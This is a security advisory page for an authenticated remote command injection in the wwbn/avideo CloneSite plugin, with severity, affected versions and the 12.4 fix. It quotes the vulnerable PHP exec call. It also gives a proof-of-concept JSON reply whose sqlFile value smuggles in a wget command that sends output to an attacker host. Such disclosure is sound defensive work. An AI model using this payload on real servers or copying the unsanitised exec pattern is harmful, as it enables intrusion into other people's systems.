GHSA-6vrj-ph27-qfp3

Suggest an improvement
Source
https://github.com/advisories/GHSA-6vrj-ph27-qfp3
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-6vrj-ph27-qfp3/GHSA-6vrj-ph27-qfp3.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-6vrj-ph27-qfp3
Aliases
Published
2023-04-27T23:53:45Z
Modified
2024-02-16T08:21:56.770129Z
Severity
  • 8.8 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
Summary
Remote code injection in wwbn/avideo
Details

WWBN Avideo Authenticated RCE - OS Command Injection

Description

An OS Command Injection vulnerability in an Authenticated endpoint /plugin/CloneSite/cloneClient.json.php allows attackers to achieve Remote Code Execution.

Vulnerable code:

$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}";
$log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file");
exec($cmd . " 2>&1", $output, $return_val);

We can control $objClone->cloneSiteURL through the admin panel clone site feature.

/plugin/CloneSite/cloneClient.json.php sends a GET Request to {$objClone->cloneSiteURL}/plugin/CloneSite/cloneServer.json.php. I hosted a specially crafted cloneServer.json.php that prints the following JSON data

{"error":false,"msg":"","url":"https:\/\/REDACTED/\/","key":"REDACTED","useRsync":1,"videosDir":"\/var\/www\/html\/[demo.avideo.com](http://demo.avideo.com/)\/videos\/","sqlFile":"Clone_mysqlDump_644ab263e62d6.sql; wget [http://REDACTED:4444/`pwd`](http://redacted:4444/pwd) ;#","videoFiles":[],"photoFiles":[]}

Send a GET Request to /plugin/CloneSite/cloneClient.json.php then remote code execution is achieved.

rce

References

Affected packages

Packagist / wwbn/avideo

Package

Name
wwbn/avideo
Purl
pkg:composer/wwbn/avideo

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
12.4

Affected versions

10.*

10.4
10.8

Other

11

11.*

11.1
11.1.1
11.5
11.6